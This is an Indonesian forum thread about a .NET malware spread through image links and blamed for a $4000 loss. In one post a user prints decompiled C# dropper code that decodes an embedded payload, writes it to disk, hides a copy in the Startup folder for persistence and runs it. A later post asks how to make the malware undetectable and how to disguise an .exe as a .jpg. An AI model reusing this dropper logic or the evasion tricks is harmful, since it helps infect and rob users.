New Malware

**hamdan_zenith** · 11-18-2014, 09:18 PM

iya bener om gak muncul gambarnya juga di ane Big Grin

tapi parah banget tuh smpe $4000 -_-

**jufianto** · 11-18-2014, 10:13 PM

om gambarnya ngk muncul

**wine trochanter** · 11-18-2014, 10:48 PM

iye gambar kgk muncul juga nih

**abdilahrf** · 11-19-2014, 12:30 AM

(11-18-2014, 09:18 PM)hamdan_zenith Wrote: iya bener om gak muncul gambarnya juga di ane
tapi parah banget tuh smpe $4000 -_-

hehe siap om gambarnya dah ane kasih link bawahnya jadi bisa klik Big Grin

iya sangat bahaya om 40jt bisa beli tanah :v

(11-18-2014, 10:13 PM)jufianto Wrote: om gambarnya ngk muncul

hehe udah ane tambahin linknya

(11-18-2014, 10:48 PM)wine trochanter Wrote: iye gambar kgk muncul juga nih

udah ane tambahin link nya Big Grin

**Mochammad Choìrul Anam** · 11-20-2014, 08:54 PM

Om saya klik linknya tadi gimana nih ?

**Shadow_** · 11-20-2014, 11:20 PM

(11-18-2014, 11:13 AM)abdilahrf Wrote:
(11-18-2014, 10:54 AM)m3t4b3t4 Wrote: Seru juga tuh bro buat promosi dagangan di setiap forum, hehee dont try this at IBT

ini lebih parah dari promosi :3

nenek" aja ilang $4000 gara" klik doang :v

wah,nenek nenek ???

**abdilahrf** · 11-20-2014, 11:42 PM

(11-20-2014, 08:54 PM)Mochammad Choìrul Anam Wrote: Om saya klik linknya tadi gimana nih ?

@Mochammad Choìrul Anam : Kalau pake linux sama ngak buka steam aman
soalnya malwarenya based .NET

@Shadow_ : :v iya om nenek-nenek =))
kalau gak percaya ini chatiingan sama orangnya
https://disqus.com/home/user/disqus_hbiVM2ch01/

[Image: avatar92.jpg]

**Mimin** · 11-21-2014, 02:45 PM

mmm, exe + binary + self defense firewall

oke tuuh.. Big Grin

**devilscream** · 11-23-2014, 01:45 AM

https://www.virustotal.com/en/file/4eec4.../analysis/

itu hasil Scan dari dropper virus ini xD , cuman 6 antivirus yang mendeteksi

Code:
[MethodImpl(MethodImplOptions.NoInlining)]

private static void Method4()

{

    string text = File.ReadAllText(Process.GetCurrentProcess().MainModule.FileName);

    string text2 = "<description>";

    string text3 = "</description>";

    string expression = Class2.Method1(Class3.Method3(ref text, ref text2, ref text3));

    Class3.Field1 = Strings.Split(expression, "\\\\", -1, CompareMethod.Binary);

    for (int i = 0; i <= Class3.Field1.Length - 1; i++)

    {

        if (!string.IsNullOrEmpty(Class3.Field1[i]))

        {

            try

            {

                string[] array = Strings.Split(Class3.Field1[i], "||", -1, CompareMethod.Binary);

                string s = array[0];

                string text4 = Interaction.Environ(array[1]) + "\\" + array[2];

                string a = array[3];

                string a2 = array[4];

                int millisecondsTimeout = Convert.ToInt32(array[5]) * 1000;

                if (File.Exists(text4))

                {

                    File.Delete(text4);

                }

                File.WriteAllBytes(text4, Class3.Method1(Convert.FromBase64String(s)));

                if (a2 == "True")

                {

                    string text5 = Environment.GetFolderPath(Environment.SpecialFolder.Startup) + "\\" + array[2];

                    if (File.Exists(text5))

                    {

                        File.Delete(text5);

                    }

                    File.Copy(text4, text5);

                    File.SetAttributes(text5, FileAttributes.Hidden);

                }

                Thread.Sleep(millisecondsTimeout);

                if (a == "Yes")

                {

                    Process.Start(text4);

                }

            }

            catch (Exception ex)

            {

                MessageBox.Show(ex.ToString());

            }

        }

    }

    Process.GetCurrentProcess().Kill();

}

**bre-ann** · 10-21-2015, 11:18 AM

FUD nya di gimana in yah tuh biar ga ke detect gitu ? kalo ganti exe. jadi .jpg nya sih di spoof di cmd bisa yah ? cuma itu kalo di posting di source photo , apa malware nya masih ada ?